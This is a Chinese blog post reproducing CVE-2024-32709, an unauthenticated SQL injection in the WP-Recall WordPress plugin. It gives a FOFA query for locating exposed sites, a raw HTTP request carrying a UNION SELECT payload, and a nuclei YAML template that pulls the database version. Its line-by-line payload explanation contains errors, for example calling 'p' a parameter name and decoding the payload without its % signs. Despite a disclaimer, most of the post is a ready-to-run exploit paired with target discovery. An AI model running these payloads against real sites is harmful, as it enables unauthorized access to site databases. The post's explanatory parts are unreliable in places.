【漏洞复现】WordPress——Recall——SQL注入(CVE-2024-32709)

原创 已于 2024-07-15 11:27:28 修改 · 2.4k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #网络安全 #渗透测试

于 2024-07-11 08:39:22 首次发布

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。其插件WP-Recall其插件存在account存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

漏洞复现

1)信息收集
fofa:"/wp-content/plugins/wp-recall/"
在这里插入图片描述

赢得了时间就是赢得了一切。
在这里插入图片描述

2)构造数据包

GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+- HTTP/1.1
Host:ip

payloud解释:

原始payload:

p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+-

解码后的payload(将URL编码转换为普通字符):

p'+or+''='+union all select 1,2,3,4,5,6,7,8,9,10,11,concat("Database:",md5(123456),0x7c),13--+-

分析:

  1. p':这是一个SQL查询的一部分,其中p是参数名,'是单引号,用于闭合字符串。
  2. +or+:在SQL语句中,OR通常用于组合多个条件。这里使用+作为URL编码的空格替代,or+用来绕过某些输入过滤规则。
  3. ''=':这里使用了两个单引号和一个等号,尝试闭合SQL语句并开始一个新的条件。
  4. union all selectUNION ALL是SQL中的一个操作符,用于将多个SELECT语句的结果合并为一个结果集。
  5. 1,2,3,4,5,6,7,8,9,10,11:这是一系列数字,用于占位或生成结果集中的列。
  6. concat("Database:",md5(123456),0x7c)CONCAT()函数用于连接字符串,这里连接了"Database:"和md5(123456)的输出,以及十六进制数0x7c(ASCII中的竖线字符|)。
  7. 13--+-:尝试混淆SQL语句,使得SQL引擎忽略后面的内容。
  8. md5(123456):e10adc3949ba59abbe56e057f20f883e

在这里插入图片描述
回显包含123456的md5值,漏洞存在。
在这里插入图片描述
页面也有回显!

测试工具

yaml-poc

id: CVE-2024-32709

info:
  name: WP-Recall <= 16.26.5 - SQL Injection
  author: securityforeveryone
  severity: critical
  description: |
    The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: Fixed in 16.26.6
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32709
    - https://github.com/truonghuuphuc/CVE-2024-32709-Poc
    - https://patchstack.com/database/vulnerability/wp-recall/wordpress-wp-recall-plugin-16-26-5-sql-injection-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2024-32709
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/wp-recall/"
  tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200

运行过程
在这里插入图片描述

在最平常的事情中都可以显示出一个人人格的伟大来!

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值